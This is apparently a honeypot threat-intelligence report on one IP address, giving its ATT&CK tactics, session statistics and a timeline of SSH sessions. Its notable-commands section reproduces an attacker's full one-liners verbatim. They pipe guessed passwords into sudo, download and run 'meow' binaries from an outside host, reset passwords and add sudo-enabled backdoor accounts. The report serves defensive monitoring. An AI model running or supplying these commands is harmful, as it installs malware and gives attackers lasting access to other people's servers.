35.185.82.208
Location: 🇺🇸 US / North Charleston
ASN: AS396982 · Google LLC
Cloud Provider: —
Total Events: 192 (above average by volume)
Agent Count: 1
First / Last Seen: 2026-06-01 01:11 — 2026-06-01 01:13
Attack Types
MITRE ATT&CK Techniques
- Initial Access
- Execution
- Defense Evasion
- Discovery
- Command and Control
External Corroboration
Blocklist.de
blocklist_de:reported
Session Forensics
Sessions: 13 (4 with login)
Avg Depth Score: 0.4
Commands Executed: 117
Files Downloaded: 4
Notable Commands
- echo 'toor' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):toor > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):toor > /tmp/mew)
- whoami
- cd /tmp
- ulimit -n 1020000
- rm -rf meow*
- wget http://35.237.91.38/meow
- curl -O http://35.237.91.38/meow
- chmod 777 meow
- ./meow
- echo 'admin123' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):admin123 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):admin123 > /tmp/mew)
- echo 'server' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):server > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):server > /tmp/mew)
- echo 'webmaster' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):webmaster > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):webmaster > /tmp/mew)
Download URLs
- http://35.237.91.38/meowarm64
- http://35.237.91.38/meow
Fingerprints
HASSH
SSH Client
Evidence Timeline
Scanner
84812d7436df
15%
SSH-2.0-Go
Interactive Operator
08cfed3029f0
LOGIN
30
1
90%
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo 'toor' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm…
$ whoami
$ whoami
$ cd /tmp
$ ulimit -n 1020000
Interactive Operator
130bf3e35eba
LOGIN
30
1
90%
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo 'admin123' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000…
$ whoami
$ whoami
$ cd /tmp
$ ulimit -n 1020000
Malware Dropper
c3bbbe1a6704
LOGIN
30
4
1
100%
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo 'server' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; …
$ whoami
$ whoami
$ cd /tmp
$ ulimit -n 1020000
http://35.237.91.38/meowarm64
http://35.237.91.38/meowarm64
http://35.237.91.38/meow
Interactive Operator
a5d165a0bea1
LOGIN
27
1
90%
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo 'webmaster' | sudo -S sh -c 'cd /tmp; ulimit -n 102000…
$ whoami
$ whoami
$ cd /tmp
$ ulimit -n 1020000
Scanner
595a7fd5d3b8
15%